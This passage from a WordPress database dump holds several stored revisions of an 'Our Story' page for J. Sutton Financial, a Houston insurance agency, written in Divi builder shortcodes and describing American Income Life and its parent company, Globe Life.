city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-03 23:20:54','2023-04-03 23:20:54','',26,'http://cmdev-site1.com/?p=703',0,'revision','',0),(661,3,'2023-04-03 12:02:35','2023-04-03 12:02:35','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" custom_margin=\"-11px|||||\" custom_padding=\"33px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"1px|auto|66px|auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\" global_colors_info=\"{}\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-03 12:02:35','2023-04-03 12:02:35','',26,'http://cmdev-site1.com/?p=661',0,'revision','',0),(609,1,'2023-04-02 18:55:44','2023-04-02 18:55:44','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Our Story\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"33px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\" global_colors_info=\"{}\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-02 18:55:44','2023-04-02 18:55:44','',26,'http://cmdev-site1.com/?p=609',0,'revision','',0),(607,1,'2023-04-02 18:54:28','2023-04-02 18:54:28','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Our Story\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" global_colors_info=\"{}\" color=\"#003372\" sticky_enabled=\"0\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"33px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\" global_colors_info=\"{}\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-02 18:54:28','2023-04-02 18:54:28','',26,'http://cmdev-site1.com/?p=607',0,'revision','',0),(598,1,'2023-04-02 18:46:45','2023-04-02 18:46:45','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" min_height=\"200.8px\" custom_margin=\"-14px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" custom_padding=\"||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][dsm_text_divider _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" header=\"Our Story\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" sticky_enabled=\"0\" header_level=\"h2\" header_text_align=\"center\" divider_style=\"dotted\" divider_weight=\"3px\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Justin Confrence Room 2 Black & White Muted\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"-11px|||||\" custom_padding=\"33px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" custom_padding=\"0px||0px|||\" custom_margin=\"66px|auto|66px|auto||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,2_3\" custom_padding=\"66px||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"-31px|||||\"][/dsm_perspective_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"48px|||||\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Happy family mother father and daughter walk on nature on sunset\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,2_3\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"66px||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row 